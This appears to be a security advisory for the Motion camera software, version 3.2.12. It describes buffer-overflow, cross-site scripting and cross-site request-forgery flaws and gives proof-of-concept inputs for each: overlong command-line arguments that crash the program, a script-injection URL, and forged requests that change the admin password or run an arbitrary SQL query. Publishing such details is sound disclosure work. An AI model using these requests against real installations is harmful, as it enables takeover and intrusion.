Motion is prone to multiple security vulnerabilities including multiple buffer-overflow vulnerabilities, a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, execute arbitrary code, and cause denial-of-service conditions. Other attacks may also be possible.

Motion 3.2.12 is vulnerable; other versions may also be affected. 

Buffer-overflow:

# motion -c `python -c 'print "\x41"*1000'`
[0] Configfile
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
not fou:
Segmentation fault


# motion -p /tmp/`python -c 'print "\x41"*5000'`
Segmentation fault

Cross-site scripting:

http://www.example.com
<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>

Cross-site request forgery:

http://www.example.com/0/config/set?control_authentication=admin:mypassword
(Set admin password)
http://www.example.com/0/config/set?sql_query=SELECT%20user() (Arbitrary 
SQL
query)